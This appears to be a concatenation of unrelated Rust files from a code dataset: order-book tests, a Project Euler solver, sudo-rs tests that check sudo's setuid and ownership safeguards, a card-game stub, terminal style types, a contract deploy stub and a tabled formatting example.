test_order.uid = 10005;
test_order.side = OrderSide::Bid;
orderbook.match_entry(&mut test_order.clone());
match orderbook.bid_price_index.get(&dec!(1.24)) {
Some(_) => panic!("error"),
None => (),
}
match orderbook.bid_price_index.get(&dec!(1.23)) {
Some(_) => panic!("error"),
None => (),
}
let node = orderbook.ask_price_index.get(&dec!(1.25)).unwrap();
assert_eq!(node.qty, dec!(50));
assert_eq!(node.price, dec!(1.25));
assert_eq!(node.order_slot, 3usize);
assert_eq!(node.last_slot, 3usize);
assert_eq!(orderbook.orders[1].logic.used, false);
assert_eq!(orderbook.orders[2].logic.used, false);
assert_eq!(orderbook.orders[3].logic.used, true);
} //}}}}}}
#[test]
fn snapshot_test() {
let mut orderbook = OrderBook::new(2, "BTC_USDT".to_owned());
let mut test_order = OrderInfo::default();
test_order.id = 1;
test_order.price = dec!(1.23);
test_order.raw_qty = dec!(100);
test_order.remain_qty = dec!(100);
test_order.uid = 10001;
orderbook.insert_order(&mut test_order.clone());
orderbook.snapshot();
}
}
fn main() {}
|
pub trait AsRefOpt<T> {
fn as_ref_opt(&self) -> Option<&T>;
}
pub trait FromRefOpt<U> {
fn from_ref_opt(u: &U) -> Option<&Self>;
}
impl<T, U> FromRefOpt<U> for T
where
U: AsRefOpt<T>,
{
fn from_ref_opt(u: &U) -> Option<&Self> {
u.as_ref_opt()
}
}
|
use std::io::prelude::*;
use std::fs::File;
use std::io::{BufReader, Error};
use std::cmp;
pub fn read_traingle() -> Result<Vec<Vec<u32>>, Error> {
let f = try!(File::open("../data/problem_018_input.txt"));
let reader = BufReader::new(f);
let mut nums = vec![];
for line in reader.lines() {
let line = try!(line);
let row: Vec<u32> = line.split_whitespace().map(|d| d.parse::<u32>().unwrap()).collect();
nums.push(row);
}
Ok(nums)
}
pub fn max_path(triangle: Vec<Vec<u32>>) -> u32 {
let mut max_sum: Vec<Vec<u32>> = vec![];
for (index, row) in triangle.iter().enumerate() {
if index == 0 {
max_sum.push(row.to_owned());
} else {
let mut row_max = vec![];
for (pos, &value) in row.clone().iter().enumerate() {
let left = match pos {
0 => 0,
_ => max_sum[index - 1][pos - 1],
};
let right = match pos {
x if x == index => 0,
_ => max_sum[index - 1][pos],
};
row_max.push(value + cmp::max(left, right));
}
max_sum.push(row_max)
}
}
*max_sum.last().unwrap().iter().max().unwrap()
}
pub fn problem_018() -> u32 {
let triangle = read_traingle().unwrap();
max_path(triangle)
}
#[cfg(test)]
mod test {
use super::*;
use test::Bencher;
#[test]
fn test_problem_018() {
let ans: u32 = problem_018();
println!("Answer to Problem 18: {}", ans);
assert!(ans == 1074)
}
#[bench]
fn bench_problem_018(b: &mut Bencher) {
b.iter(|| problem_018());
}
}
|
pub struct Process {
cmdName: &'static str,
state: &'static str,
pid: &'static str,
mem: f64,
time: &'static str,
user: &'static str,
}
impl Process {
pub fn new(
name: &'static str,
state: &'static str,
pid: &'static str,
mem: f64,
time: &'static str,
user: &'static str,
) -> Process {
Process {
cmdName: name,
state: state,
pid: pid,
mem: mem,
time: time,
user: user,
}
}
pub fn toString(&self) -> String {
let mut tmpStr = String::new();
tmpStr.push_str(self.pid);
tmpStr.push_str(self.user);
tmpStr.push_str(self.time);
tmpStr.push_str(&self.mem.to_string());
tmpStr.push_str(self.cmdName);
return tmpStr;
}
}
|
use sudo_test::{Command, Env};
use crate::{Result, PANIC_EXIT_CODE, SUDOERS_ALL_ALL_NOPASSWD, USERNAME};
macro_rules! assert_snapshot {
($($tt:tt)*) => {
insta::with_settings!({
prepend_module_to_snapshot => false,
snapshot_path => "../snapshots/misc",
}, {
insta::assert_snapshot!($($tt)*)
});
};
}
#[test]
fn user_not_in_passwd_database_cannot_use_sudo() -> Result<()> {
let env = Env(SUDOERS_ALL_ALL_NOPASSWD).build()?;
let output = Command::new("sudo")
.arg("true")
.as_user_id(1000)
.output(&env)?;
assert!(!output.status().success());
assert_eq!(Some(1), output.status().code());
let stderr = output.stderr();
if sudo_test::is_original_sudo() {
assert_snapshot!(stderr);
} else {
assert_contains!(stderr, "user 'current user' not found");
}
Ok(())
}
fn closes_open_file_descriptors(tty: bool) -> Result<()> {
let script_path = "/tmp/script.bash";
let defaults = if tty {
"Defaults use_pty"
} else {
"Defaults !use_pty"
};
let env = Env([SUDOERS_ALL_ALL_NOPASSWD, defaults])
.file(
script_path,
include_str!("misc/read-parents-open-file-descriptor.bash"),
)
.build()?;
let output = Command::new("bash")
.arg(script_path)
.tty(tty)
.output(&env)?;
assert!(!output.status().success());
assert_eq!(Some(1), output.status().code());
assert_contains!(
if tty {
// Docker merges stderr into stdout with "--tty". See gh622
output.stdout_unchecked()
} else {
output.stderr()
},
"42: Bad file descriptor"
);
Ok(())
}
#[test]
fn closes_open_file_descriptors_with_tty() -> Result<()> {
closes_open_file_descriptors(true)
}
#[test]
fn closes_open_file_descriptors_without_tty() -> Result<()> {
closes_open_file_descriptors(false)
}
#[test]
fn sudo_binary_lacks_setuid_flag() -> Result<()> {
let env = Env(SUDOERS_ALL_ALL_NOPASSWD).user(USERNAME).build()?;
Command::new("chmod")
.args(["0755", "/usr/bin/sudo"])
.output(&env)?
.assert_success()?;
let output = Command::new("sudo")
.arg("true")
.as_user(USERNAME)
.output(&env)?;
assert!(!output.status().success());
assert_eq!(Some(1), output.status().code());
assert_contains!(
output.stderr(),
"sudo must be owned by uid 0 and have the setuid bit set"
);
Ok(())
}
#[test]
fn sudo_binary_is_not_owned_by_root() -> Result<()> {
let env = Env(SUDOERS_ALL_ALL_NOPASSWD).user(USERNAME).build()?;
Command::new("chown")
.args([USERNAME, "/usr/bin/sudo"])
.output(&env)?
.assert_success()?;
let output = Command::new("sudo")
.arg("true")
.as_user(USERNAME)
.output(&env)?;
assert!(!output.status().success());
assert_eq!(Some(1), output.status().code());
assert_contains!(
output.stderr(),
"sudo must be owned by uid 0 and have the setuid bit set"
);
Ok(())
}
#[test]
fn works_when_invoked_through_a_symlink() -> Result<()> {
let symlink_path = "/tmp/sudo";
let env = Env(SUDOERS_ALL_ALL_NOPASSWD).user(USERNAME).build()?;
Command::new("ln")
.args(["-s", "/usr/bin/sudo", symlink_path])
.as_user(USERNAME)
.output(&env)?
.assert_success()?;
// symlink is not owned by root
let ls_output = Command::new("ls")
.args(["-ahl", symlink_path])
.output(&env)?
.stdout()?;
// lrwxrwxrwx 1 ferris users
eprintln!("{ls_output}");
// symlink has not the setuid bit set
let stat_output = Command::new("stat")
.args(["-c", "%a", symlink_path])
.output(&env)?
.stdout()?;
// 777
eprintln!("{stat_output}");
// still, we expect sudo to work because the executable behind the symlink has the right
// ownership and permissions
Command::new(symlink_path)
.arg("true")
.as_user(USERNAME)
.output(&env)?
.assert_success()
}
#[test]
fn does_not_panic_on_io_errors_no_command() -> Result<()> {
let env = Env("").build()?;
let output = Command::new("bash")
.args(["-c", "sudo 2>&1 | true; echo \"${PIPESTATUS[0]}\""])
.output(&env)?;
let exit_code = output.stdout()?.parse()?;
assert_ne!(PANIC_EXIT_CODE, exit_code);
assert_eq!(1, exit_code);
Ok(())
}
#[test]
fn does_not_panic_on_io_errors_cli_error() -> Result<()> {
let env = Env("").build()?;
let output = Command::new("bash")
.args([
"-c",
"sudo --bad-flag 2>&1 | true; echo \"${PIPESTATUS[0]}\"",
])
.output(&env)?;
let exit_code = output.stdout()?.parse()?;
assert_ne!(PANIC_EXIT_CODE, exit_code);
assert_eq!(1, exit_code);
Ok(())
}
|
use std::io;
use std::collections::{ VecDeque };
macro_rules! parse_input {
($x:expr, $t:ident) => ($x.trim().parse::<$t>().unwrap())
}
struct Player {
deck: VecDeque<String>
}
impl Player {
fn new (n: i32) -> Self {
Self {
deck: VecDeque::with_capacity(n as usize)
}
}
fn deck_len (&self) -> usize {
self.deck.len()
}
fn update_deck (&mut self, cardp: String) {
self.deck.push_back(cardp);
}
}
fn main() {
let mut input_line = String::new(); io::stdin().read_line(&mut input_line).unwrap();
let n = parse_input!(input_line, i32); // the number of cards for player 1
let mut p1 = Player::new(n);
for i in 0..p1.deck_len() as usize {
let mut input_line = String::new(); io::stdin().read_line(&mut input_line).unwrap();
let cardp_1 = input_line.trim().to_string(); // the n cards of player 1
p1.update_deck(cardp_1);
}
let mut input_line = String::new(); io::stdin().read_line(&mut input_line).unwrap();
let m = parse_input!(input_line, i32); // the number of cards for player 2
let mut p2 = Player::new(m);
for i in 0..m as usize {
let mut input_line = String::new(); io::stdin().read_line(&mut input_line).unwrap();
let cardp_2 = input_line.trim().to_string(); // the m cards of player 2
p2.update_deck(cardp_2);
}
println!("PAT");
}
|
pub mod termion;
pub use self::termion::TermionStyles;
pub type StyleID = i16;
pub const STYLE_LEN: usize = 20;
/// The style id 0 is reserved for the selection style id.
///
/// This id is different than the pair id.
pub const SELECTION_STYLE_ID: StyleID = 0;
pub const LINE_SECTION_STYLE_ID: StyleID = 9999;
/// An RGB color description.
///
/// Each value define the amount of a primary color composing it. The possible
/// values for each primary color go from `0` for the absence of color to `255`
/// for the full presence of the color.
///
/// Example:
/// ```rust
/// let black = RGBColor{r: 0, g: 0, b: 0}
/// let white = RGBColor{r: 255, g: 255, b: 255}
/// let red = RGBColor{r: 255, g: 0, b: 0}
/// ```
#[derive(Debug, Clone, Copy)]
pub struct RGBColor {
/// red
pub r: u8,
/// green
pub g: u8,
/// blue
pub b: u8,
}
#[derive(Debug, Clone, PartialEq)]
pub struct Style {
pub background: Option<String>,
pub foreground: Option<String>,
pub italic: bool,
}
#[derive(Debug, PartialEq, Clone)]
pub struct StyleRange {
start: u32,
end: u32,
style: Style,
}
pub trait Styles {
fn append_with_style(&self, to_append: &str, style_id: StyleID, dest: &mut String);
fn apply_to(&self, inputs: Vec<i16>, input: &str) -> String;
fn save(
&mut self,
style_id: StyleID,
fg_color: Option<RGBColor>,
bg_color: Option<RGBColor>,
italic: bool,
);
}
|
#![no_main]
use managed_counter::deployer;
#[no_mangle]
pub extern "C" fn call() {
deployer::deploy_manager_contract(String::from("manager"));
}
|
//! This example demonstrates using the [attribute macro](https://doc.rust-lang.org/reference/procedural-macros.html#attribute-macros)
//! [`rename_all`] to apply table-wide header formatting in a [`Table`] display.
//!
//! * Supported formatting rules include:
//! * 'camelCase'
//! * 'kabab-case'
//! * 'PascalCase'
//! * 'SCREAMING_SNAKE_CASE'
//! * 'snake_case'
//! * 'lowercase'
//! * 'UPPERCASE'
//! * 'verbatim'
use tabled::{Table, Tabled};
#[derive(Tabled)]
#[tabled(rename_all = "camelCase")]
struct Country {
name: &'static str,
capital_city: &'static str,
surface_area_km2: f32,
#[tabled(rename_all = "kebab-case")]
national_currency: &'static str,
#[tabled(rename_all = "kebab-case")]
national_currency_short: &'static str,
}
impl Country {
fn new(
name: &'static str,
national_currency: &'static str,
national_currency_short: &'static str,
capital_city: &'static str,
surface_area_km2: f32,
) -> Self {
Self {
name,
national_currency,
national_currency_short,
capital_city,
surface_area_km2,
}
}
}
fn main() {
let data = [
Country::new("Afghanistan", "Afghani", "AFN", "Kabul", 652867.0),
Country::new("Angola", "Kwanza", "AOA", "Luanda", 1246700.0),
Country::new("Canada", "Canadian Dollar", "CAD", "Ottawa", 9984670.0),
];
let table = Table::new(data);
println!("{table}");
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.